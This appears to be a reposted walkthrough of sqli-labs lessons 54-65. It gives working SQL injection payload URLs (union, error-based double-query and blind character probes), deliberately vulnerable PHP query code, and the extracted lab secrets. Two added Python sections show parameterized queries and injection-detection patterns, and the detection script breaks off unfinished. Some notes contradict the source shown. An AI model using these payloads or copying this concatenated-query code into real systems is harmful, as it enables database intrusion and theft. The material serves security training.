SQLI-LAB practice notes (Less 54 - Less 65)
Source: Internet; Editor: 程序博客网; Time: 2024/05/21 17:59
- Less - 54 Challenge-1
  - Test
  - Source Code
  - Solution
- Less - 55 Challenge-2
  - Test
  - Source Code
  - Solution
- Less - 56 Challenge-3
  - Test
  - Source Code
  - Solution
- Less - 57 Challenge-4
  - Test
  - Source Code
  - Solution
- Less - 58 Challenge-5
  - Test
  - Source Code
  - Solution
- Less - 59 Challenge-6
  - Test
  - Source Code
  - Solution
- Less - 60 Challenge-7
  - Test
  - Source Code
  - Solution
- Less - 61 Challenge-8
  - Test
  - Source Code
  - Solution
- Less - 62 Challenge-9
  - Test
  - Source Code
  - Solution
- Less - 63 Challenge-10
  - Test
  - Source Code
  - Solution
- Less - 64 Challenge-11
  - Test
  - Source Code
  - Solution
- Less - 65 Challenge-12
  - Test
  - Source Code
  - Solution
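The following is only a record I wrote down while working through the sqli-lab exercises; it is for reference only.
Because I have already studied some SQL injection, most of the content comes without explanation. If anything is unclear, please look it up with a search engine; I believe you will find what you need.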
Less - 54 Challenge-1
(Lesson 54: Challenge - 1)
Test:
http://localhost/sqli-lab/Less-54/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 10 attempts
Note: database name: challenges; maximum attempts: 10
http://localhost/sqli-lab/Less-54/index.php?id=1') union select 1,2,3 --+
Note: no valid output is displayed
http://localhost/sqli-lab/Less-54/index.php?id=1' union select 1,2,3 --+
Note: works normally; id is wrapped in single quotes
Source Code:
// $id is concatenated into the query inside single quotes
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}
else
{
    //print_r(mysql_error());   // error output is disabled
}
Solution:
http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
// 2x51x9lc2b
http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='2x51x9lc2b' --+
// id,sessid,secret_QD6G,tryy
http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(secret_QD6G),group_concat(sessid) from challenges.2x51x9lc2b --+
// t5OPJLdkJ60DsyF7T1ZL3rfD
// 140491cdf5b17300fc51147a33ae86bf
Note: a regexp match reveals the table name and column name directly:
http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,table_name,column_name from information_schema.columns where column_name regexp '^secret_[A-Z]{4}$' limit 0,1;
Less - 55 Challenge-2
(Lesson 55: Challenge - 2)
Test:
http://localhost/sqli-lab/Less-55/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts
Note: database name: challenges; maximum attempts: 14
http://localhost/sqli-lab/Less-55/index.php?id=1' union select 1,2,3 --+
http://localhost/sqli-lab/Less-55/index.php?id=1') union select 1,2,3 --+
http://localhost/sqli-lab/Less-55/index.php?id=1" union select 1,2,3 --+
http://localhost/sqli-lab/Less-55/index.php?id=1") union select 1,2,3 --+
Note: no valid output is displayed
http://localhost/sqli-lab/Less-55/index.php?id=1) union select 1,2,3 --+
Note: works normally; id is wrapped in one layer of parentheses
Source Code:
// $id is concatenated into the query inside parentheses, without quotes
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}
else
{
    //print_r(mysql_error());   // error output is disabled
}
Solution:
http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
// tyqb9xz99r
http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='tyqb9xz99r' --+
// id,sessid,secret_0LLE,tryy
http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(secret_0LLE),group_concat(sessid) from challenges.tyqb9xz99r --+
// HvXC6g9NxUeGwZtpfdEYCtUO
// 486412045b0a355f953e5aa5c8446bcb
Less - 56 Challenge-3
(Lesson 56: Challenge - 3)
Test:
http://localhost/sqli-lab/Less-56/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts
Note: database name: challenges; maximum attempts: 14
http://localhost/sqli-lab/Less-56/index.php?id=1' union select 1,2,3 --+
Note: no valid output is displayed
http://localhost/sqli-lab/Less-56/index.php?id=1') union select 1,2,3 --+
http://localhost/sqli-lab/Less-56/index.php?id=1" union select 1,2,3 --+
http://localhost/sqli-lab/Less-56/index.php?id=1") union select 1,2,3 --+
Note: works normally; id is wrapped in double quotes and one layer of parentheses
Source Code:
// $id is concatenated into the query inside ('...')
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}
else
{
    //print_r(mysql_error());   // error output is disabled
}
Solution:
http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
// l1meh6v8xf
http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l1meh6v8xf' --+
// id,sessid,secret_ZIEU,tryy
http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(secret_ZIEU),group_concat(sessid) from challenges.l1meh6v8xf --+
// 3zjx2Ef32x2clWJlRlS4n2wc
// 2de68a7c5e3db6a836ab8f5f109416b8
Less - 57 Challenge-4
(Lesson 57: Challenge - 4)
Test:
http://localhost/sqli-lab/Less-57/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts
Note: database name: challenges; maximum attempts: 14
http://localhost/sqli-lab/Less-57/index.php?id=1") union select 1,2,3 --+
Note: no valid output is displayed
http://localhost/sqli-lab/Less-57/index.php?id=1' union select 1,2,3 --+
http://localhost/sqli-lab/Less-57/index.php?id=1') union select 1,2,3 --+
http://localhost/sqli-lab/Less-57/index.php?id=1" union select 1,2,3 --+
Note: works normally; id is wrapped in double quotes
Source Code:
// $id is wrapped in double quotes, then concatenated into the query
$id= '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}
else
{
    //print_r(mysql_error());   // error output is disabled
}
Solution:
http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
// la5spfxomc
http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(column_name),3 from information_schema.columns where table_name='la5spfxomc' --+
// id,sessid,secret_D2E9,tryy
http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(secret_D2E9),group_concat(sessid) from challenges.la5spfxomc --+
// AkXpuSMRL2Mjnxbu6ChgdDkI
// 2c26f9a59b0ba61233e6fc0af8e47f14
Less - 58 Challenge-5
(Lesson 58: Challenge - 5)
Test:
http://localhost/sqli-lab/Less-58/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
Note: database name: challenges; maximum attempts: 5
http://localhost/sqli-lab/Less-58/index.php?id=1' union select 1,2,3 --+
Note: works normally
http://localhost/sqli-lab/Less-58/index.php?id=1') union select 1,2,3 --+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') union select 1,2,3 -- ' LIMIT 0,1' at line 1
Note: id is wrapped in single quotes
Source Code:
// $id is concatenated into the query inside single quotes
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    // The displayed values come from a fixed array indexed by the row id, not from the result columns
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo 'Your Password : ' .$pass[$row['id']];
}
else
{
    print_r(mysql_error());   // the MySQL error text is returned to the client
}
Solution:
http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// qrso3pw6sh::challenges::1
http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='qrso3pw6sh' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// id,sessid,secret_MV87,tryy::1
http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(secret_MV87,0x3a, 0x3a) from challenges.qrso3pw6sh limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// 3XJM8hjFz6KNK5aoNUSApgRW::1
Less - 59 Challenge-6
(Lesson 59: Challenge - 6)
Test:
http://localhost/sqli-lab/Less-59/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
Note: database name: challenges; maximum attempts: 5
http://localhost/sqli-lab/Less-59/index.php?id=1' union select 1,2,3 --+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' union select 1,2,3 -- LIMIT 0,1' at line 1
Note: id is not wrapped in any characters
Source Code:
// $id is concatenated into the query with no quotes or parentheses
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    // The displayed values come from a fixed array indexed by the row id, not from the result columns
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo 'Your Password : ' .$pass[$row['id']];
}
else
{
    print_r(mysql_error());   // the MySQL error text is returned to the client
}
Solution:
http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// b3ndcj1o8v::challenges::1
http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='b3ndcj1o8v' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// id,sessid,secret_ZWS2,tryy::1
http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(secret_ZWS2 ,0x3a, 0x3a) from challenges.b3ndcj1o8v limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// zhEVMVgMavK0k92OSv8zmTTm::1
Less - 60 Challenge-7
(Lesson 60: Challenge - 7)
Test:
http://localhost/sqli-lab/Less-60/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
Note: database name: challenges; maximum attempts: 5
http://localhost/sqli-lab/Less-60/index.php?id=1" union select 1,2,3 --+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1,2,3 -- ") LIMIT 0,1' at line 1
Note: id is wrapped in double quotes and one layer of parentheses
Source Code:
// $id is wrapped in ("...") and then concatenated into the query
$id = '("'.$id.'")';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    // The displayed values come from a fixed array indexed by the row id, not from the result columns
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo 'Your Password : ' .$pass[$row['id']];
}
else
{
    print_r(mysql_error());   // the MySQL error text is returned to the client
}
Solution:
http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// p9gd2w7p0n::challenges::1
http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='p9gd2w7p0n' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// id,sessid,secret_THZK,tryy::1
http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(secret_THZK ,0x3a, 0x3a) from challenges.p9gd2w7p0n limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// OSpAsCGlNQ8qbUtTnEXHd0WL::1
Less - 61 Challenge-8
(Lesson 61: Challenge - 8)
Test:
http://localhost/sqli-lab/Less-61/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
Note: database name: challenges; maximum attempts: 5
http://localhost/sqli-lab/Less-61/index.php?id=1' union select 1,2,3 --+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1,2,3 -- ')) LIMIT 0,1' at line 1
Note: id is wrapped in single quotes and two layers of parentheses
Source Code:
// $id is concatenated into the query inside (('...'))
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    // The displayed values come from a fixed array indexed by the row id, not from the result columns
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo 'Your Password : ' .$pass[$row['id']];
}
else
{
    print_r(mysql_error());   // the MySQL error text is returned to the client
}
Solution:
http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// t44dfrest6::challenges::1
http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='t44dfrest6' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// id,sessid,secret_BN4M,tryy::1
http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(secret_BN4M,0x3a, 0x3a) from challenges.t44dfrest6 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// dqlfs35mo8ZZlYKFZIvXboSe::1
Less - 62 Challenge-9
(Lesson 62: Challenge - 9)
Test:
http://localhost/sqli-lab/Less-62/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
Note: database name: challenges; maximum attempts: 130
http://localhost/sqli-lab/Less-62/index.php?id=1' union select 1,2,3 --+
Note: no valid output is displayed
http://localhost/sqli-lab/Less-62/index.php?id=1') union select 1,2,3 --+
Note: works normally; id is wrapped in single quotes and one layer of parentheses
Source Code:
// $id is concatenated into the query inside ('...')
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    // The displayed values come from a fixed array indexed by the row id, not from the result columns
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo 'Your Password : ' .$pass[$row['id']];
}
else
{
    //print_r(mysql_error());   // error output is disabled
}
Solution:
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 97 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 109 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 115 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) = 119 --+
// first character of the table name: w
// wlo99z7cua
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 16) = 16 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 4) = 4 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 2) = 2 --+
// 10110 = 22; fourth character from the end of the column name: V
// secret_VUBV
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 64 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 53 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 50 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select secret_VUBV from wlo99z7cua limit 0,1),1,1)) %26 1) = 1 --+
// first character of the key: 1
// 1kqTprKdfAt6VGFEoEcpYgjG
Note: random values
The table name is 10 characters long, made up of lowercase letters and digits
The last four characters of secret_XXXX are made up of uppercase letters and digits
The key is 24 characters long, made up of uppercase and lowercase letters and digits
Less - 63 Challenge-10
(Lesson 63: Challenge - 10)
Test:
http://localhost/sqli-lab/Less-63/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
Note: database name: challenges; maximum attempts: 130
http://localhost/sqli-lab/Less-63/index.php?id=1') union select 1,2,3 --+
Note: no valid output is displayed
http://localhost/sqli-lab/Less-63/index.php?id=1' union select 1,2,3 --+
Note: works normally; id is wrapped in single quotes
Source Code:
// $id is concatenated into the query inside single quotes
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    // The displayed values come from a fixed array indexed by the row id, not from the result columns
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo 'Your Password : ' .$pass[$row['id']];
}
else
{
    //print_r(mysql_error());   // error output is disabled
}
Solution:
http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) > 64 --+
http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 96 --+
http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 77 --+
http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) > 70 --+
http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 73 --+
http://localhost/sqli-lab/Less-63/index.php?id=1' and (ord(substr((select secret_8FVY from gelqg5ya7p limit 0,1),1,1)) %26 1) = 1 --+
// first character of the key: G
// Gd65kBLDXbCY7wrwRq5jzM4l
Less - 64 Challenge-11
(Lesson 64: Challenge - 11)
Test:
http://localhost/sqli-lab/Less-64/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
Note: database name: challenges; maximum attempts: 130
http://localhost/sqli-lab/Less-64/index.php?id=1' union select 1,2,3 --+
http://localhost/sqli-lab/Less-64/index.php?id=1') union select 1,2,3 --+
http://localhost/sqli-lab/Less-64/index.php?id=1" union select 1,2,3 --+
http://localhost/sqli-lab/Less-64/index.php?id=1") union select 1,2,3 --+
http://localhost/sqli-lab/Less-64/index.php?id=1) union select 1,2,3 --+
Note: no valid output is displayed
http://localhost/sqli-lab/Less-64/index.php?id=1)) union select 1,2,3 --+
Note: works normally; id is wrapped in two layers of parentheses
Source Code:
// $id is concatenated into the query inside two layers of parentheses, without quotes
$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    // The displayed values come from a fixed array indexed by the row id, not from the result columns
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo 'Your Password : ' .$pass[$row['id']];
}
else
{
    //print_r(mysql_error());   // error output is disabled
}
Solution:
http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) > 64 --+
http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) > 97 --+
http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 109 --+
http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 106 --+
http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 104 --+
http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) = 103 --+
// first character of the key: g
// gpu9QBywZI8jL2M7Uj6DDELa
Less - 65 Challenge-12
(Lesson 65: Challenge - 12)
Test:
http://localhost/sqli-lab/Less-65/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
Note: database name: challenges; maximum attempts: 130
http://localhost/sqli-lab/Less-65/index.php?id=1" union select 1,2,3 --+
Note: no valid output is displayed
http://localhost/sqli-lab/Less-65/index.php?id=1' union select 1,2,3 --+
http://localhost/sqli-lab/Less-65/index.php?id=1') union select 1,2,3 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") union select 1,2,3 --+
Note: works normally; id is wrapped in double quotes and one layer of parentheses
Source Code:
// $id is wrapped in double quotes, then concatenated into the query inside parentheses
$id = '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    // The displayed values come from a fixed array indexed by the row id, not from the result columns
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo 'Your Password : ' .$pass[$row['id']];
}
else
{
    //print_r(mysql_error());   // error output is disabled
}
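Every Source Code section on this page builds its query the same way: the request value is concatenated into the SQL text, and only the surrounding quotes and parentheses change. The following is an added example, not the lab's code: it uses Python with an in-memory SQLite table as a stand-in for the lab's PHP/MySQL, runs the page's `union select 1,2,3` test against each single-quote/parenthesis shape, and compares that with a bound-parameter query. The table contents and function names are assumptions made for the example.

```python
import sqlite3

# WHERE-clause shapes from the Source Code sections (quote/parenthesis wrappers
# only), each paired with the page's "union select 1,2,3" test value after URL
# decoding ("--+" on the page is "-- " once "+" becomes a space).
SHAPES = {
    "Less-54/58/63": ("id='{id}'",     "0' union select 1,2,3 -- "),
    "Less-55":       ("id=({id})",     "0) union select 1,2,3 -- "),
    "Less-56/62":    ("id=('{id}')",   "0') union select 1,2,3 -- "),
    "Less-59":       ("id={id}",       "0 union select 1,2,3 -- "),
    "Less-61":       ("id=(('{id}'))", "0')) union select 1,2,3 -- "),
    "Less-64":       ("id=(({id}))",   "0)) union select 1,2,3 -- "),
}
HARDENED_SQL = "SELECT * FROM users WHERE id = ? LIMIT 0,1"


def make_db():
    """In-memory SQLite stand-in for security.users (constructed sample row)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'Dumb', 'sample-password')")
    return db


def lookup_concat(db, where_tpl, user_id):
    """Vulnerable form: the request value becomes part of the SQL text."""
    sql = "SELECT * FROM users WHERE " + where_tpl.format(id=user_id) + " LIMIT 0,1"
    return db.execute(sql).fetchone()


def lookup_bound(db, user_id):
    """Hardened form: constant SQL text, value passed separately as a parameter."""
    return db.execute(HARDENED_SQL, (user_id,)).fetchone()


def lookup_validated(db, user_id):
    """Hardened form plus an allow-list check: id must be a plain decimal integer."""
    if not (user_id.isascii() and user_id.isdigit()):
        return None
    return lookup_bound(db, int(user_id))


def compare(db):
    """For each shape, return (row via concatenation, row via bound parameter)."""
    return {label: (lookup_concat(db, tpl, value), lookup_bound(db, value))
            for label, (tpl, value) in SHAPES.items()}


if __name__ == "__main__":
    db = make_db()
    for label, (concat_row, bound_row) in compare(db).items():
        print(f"{label:14} concatenated -> {concat_row}   bound -> {bound_row}")
    print("legitimate id=1 ->", lookup_validated(db, "1"))
```

With concatenation the returned row is whatever the request supplied, regardless of the wrapper; with a bound parameter the same value is compared as data and matches nothing.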
Solution:
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 64 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) < 97 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 77 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 84 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) < 88 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 85 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) = 87 --+
// first character of the key: W
// Wa0mYczFC0wFXygjAFaCA1Tb
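The Solution sections on this page use three query styles: union select against information_schema (Less 54-57), the floor(rand(0)*2) grouped double query (Less 58-61), and ascii/ord(substr(...)) comparisons repeated with different numbers (Less 62-65). The following is an added detection example, not part of the original notes: it classifies URL-decoded query strings from web-server access logs by those styles and counts how often one client repeats the same query shape. The log lines, client addresses and rule names are constructed for the example.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus, urlsplit

# One rule per query style seen in the Solution sections of this page.
RULES = [
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b", re.I)),
    ("error-double-query",
     re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*\bgroup\s+by\b", re.I | re.S)),
    ("blind-char-probe", re.compile(r"\b(?:ascii|ord)\s*\(\s*substr(?:ing)?\s*\(", re.I)),
]
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format, documentation-range addresses).
SAMPLE_LOG = "\n".join([
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /sqli-lab/Less-54/index.php?id=1 HTTP/1.1" 200 612',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli-lab/Less-54/index.php?id=0%27+union+select+1,'
    'group_concat(table_name),3+from+information_schema.tables+where+table_schema=%27challenges%27+--+'
    ' HTTP/1.1" 200 640',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /sqli-lab/Less-58/index.php?id=0%27+union+select+1,2,3+'
    'from+(select+count(*),concat((select+database()),floor(rand(0)*2))x+from+information_schema.tables+'
    'group+by+x)a+--+ HTTP/1.1" 200 700',
] + [
    '203.0.113.4 - - [01/Jan/2024:10:01:00 +0000] "GET /sqli-lab/Less-62/index.php?id=1%27)+and+'
    f'(ascii(substr((select+database()),1,1)))+%3E+{n}+--+ HTTP/1.1" 200 612'
    for n in (97, 109, 115)   # comparison values vary, the query shape does not
])


def classify(query):
    """Return the labels of all rules matched by a URL-decoded query string."""
    return [label for label, rx in RULES if rx.search(query)]


def scan(log_text):
    """Per flagged client: rule hit counts and the highest repeat count of one query shape."""
    rules, shapes = defaultdict(Counter), defaultdict(Counter)
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        query = unquote_plus(urlsplit(target).query)
        labels = classify(query)
        if labels:
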